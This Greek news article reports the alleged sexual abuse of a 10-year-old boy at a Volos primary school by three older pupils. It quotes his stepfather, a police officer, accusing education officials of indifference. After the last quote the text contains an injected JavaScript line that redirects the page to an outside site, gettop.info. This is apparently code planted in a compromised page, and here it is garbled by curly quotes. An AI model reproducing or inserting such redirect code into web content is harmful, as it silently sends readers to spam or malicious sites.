Με κατσαβίδι η κακοποίηση του 10χρονου στον Βόλο!

0
14

 

Με ένα καρσαβίδι φέρεται να έγινε η κακοποίηση του 10χρονου από τρεις μαθητές της έκτης δημοτικού σε δημοτικό σχολείο του Βόλου, είδηση που σόκαρε χθες το Πανελλήνιο. Το παιδί δεχόταν εκφοβισμό από τα τρία άλλα παιδιά και ζούσε έναν πραγματικό εφιάλτη.

Στο μεταξύ, ο πατριός του παιδιού, αστυνομικός στο επάγγελμα με χιλιάδες ώρες στο πεζοδρόμιο, δεν άργησε να καταλάβει ότι η μικρή αλλαγή στη συμπεριφορά του παιδιού προερχόταν από κάτι πολύ σημαντικό που το βασάνιζε. Έπειτα από πολύωρες συζητήσεις ο πατέρας του 10χρονου, που έπεσε θύμα σεξουαλικής κακοποίησης από τρία παιδιά μεγαλύτερης τάξης, κατάφερε να μάθει την αλήθεια που τον σόκαρε.

«Δεν είμαι καθόλου καλά ψυχολογικά. Είμαι ο πατριός του, ο άμεσα ενδιαφερόμενος και έχω πολύ μεγάλο θυμό μέσα μου για όσα συνέβησαν. Από τεσσάρων χρονών μεγαλώνω αυτό το παιδάκι μαζί με τη μητέρα του και ήρθε και μου είπε όλα όσα του έκαναν στο σχολείο παιδιά μεγαλύτερης τάξης και σοκαρίστηκα. Το είδα εγώ το παιδί ότι δεν ήταν καλά. Έβλεπα ότι κάτι τον προβληματίζει. Αυτός φοβόταν να τα πει στη μαμά του και ήρθε σε εμένα. Τον ψυχολόγησα εγώ, είδα κάποια συμπτώματα, τον έφερα στα νερά μου και όταν άκουσα όλα αυτά που μου είπε το παιδί, τρελάθηκα. Βουρκώνω τώρα. Έρχεται στο μυαλό μου όλο αυτό το σκηνικό που ζήσαμε μέσα στο σπίτι και καταρρέω».

Όπως καταγγέλλει στο protothema.gr ο πατέρας του 10 χρόνου αγοριού, η πρωτοβάθμια εκπαίδευση έδειξε πλήρη αδιαφορία σε ένα τόσο σοβαρό ζήτημα με αποτέλεσμα η οικογένεια του 10χρονου να κινηθεί νομικά.

«Έχω 24 χρόνια στο πεζοδρόμιο, τα μάτια μου έχουν δει πολλά και δεν υπήρχε περίπτωση να μην καταλάβω τι συνέβαινε στο παιδί μου. Καταγγέλλω την πρωτοβάθμια εκπαίδευση για εγκληματική ενέργεια. Παρόλο που τους ενημέρωσα για το περιστατικό, αυτοί δεν έκαναν απολύτως τίποτα. Δεν συγκινήθηκαν καθόλου. Ενημερώθηκαν οι προϊστάμενοι στην πρωτοβάθμια εκπαίδευση του Βόλου από τις 25 του μήνα και η αδιαφορία τους ήταν μεγάλη. Δεν πήγα να βρω κανέναν από τους άλλους γονείς των παιδιών για αυτό που έκαναν στο παιδί μου γιατί θα κινηθώ νομικά και αυτό είναι το σωστό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here